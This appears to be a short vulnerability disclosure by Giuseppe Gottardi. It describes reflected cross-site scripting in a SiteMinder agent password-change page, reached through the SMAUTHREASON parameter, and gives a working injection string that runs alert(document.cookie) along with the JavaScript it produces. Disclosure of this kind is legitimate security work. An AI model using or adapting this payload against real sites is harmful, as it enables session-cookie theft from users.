I don't know the details of vulnerable version but smpwservices.fcc page was accessed directly in the tested version. Exploit code was triggered like this: [*] with the URL: https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=X I can view this javascript code in the result page: --- function resetCredFields() { if (X == 0 || X == 4 || X == 5 || X == 28 || X == 30 ) { document.PWChange.PASSWORD.value = ''; } else if (X == 1 || X == 18 || X == 20 || X == 22 || X == 31 || X == 34) { document.PWChange.NEWPASSWORD.value = ''; document.PWChange.CONFIRMATION.value = ''; } } --- this function was called by: <BODY onLoad = 'resetCredFields();'> [*] Inserting the string "1)alert(document.cookie);}function+drop(){if(0" as SMAUTHREASON value we can modify resetCredFields() in this way: function resetCredFields() { if (1)alert(document.cookie);}function drop(){if(0 == 0 || 1)alert(document.cookie);}function drop(){if(0 == 4 || 1)alert(document.cookie);}function drop(){if(0 == 5 || 1)alert(document.cookie);}function drop(){if(0 == 28 || 1)alert(document.cookie);}function drop(){if(0 == 30 ) { document.PWChange.PASSWORD.value = ''; } else if (1)alert(document.cookie);}function drop(){if(0 == 1 || 1)alert(document.cookie);}function drop(){if(0 == 18 || 1)alert(document.cookie);}function drop(){if(0 == 20 || 1)alert(document.cookie);}function drop(){if(0 == 22 || 1)alert(document.cookie);}function drop(){if(0 == 31 || 1)alert(document.cookie);}function drop(){if(0 == 34) { document.PWChange.NEWPASSWORD.value = ''; document.PWChange.CONFIRMATION.value = ''; } } So, the alert code was executed. Regards, Giuseppe Gottardi
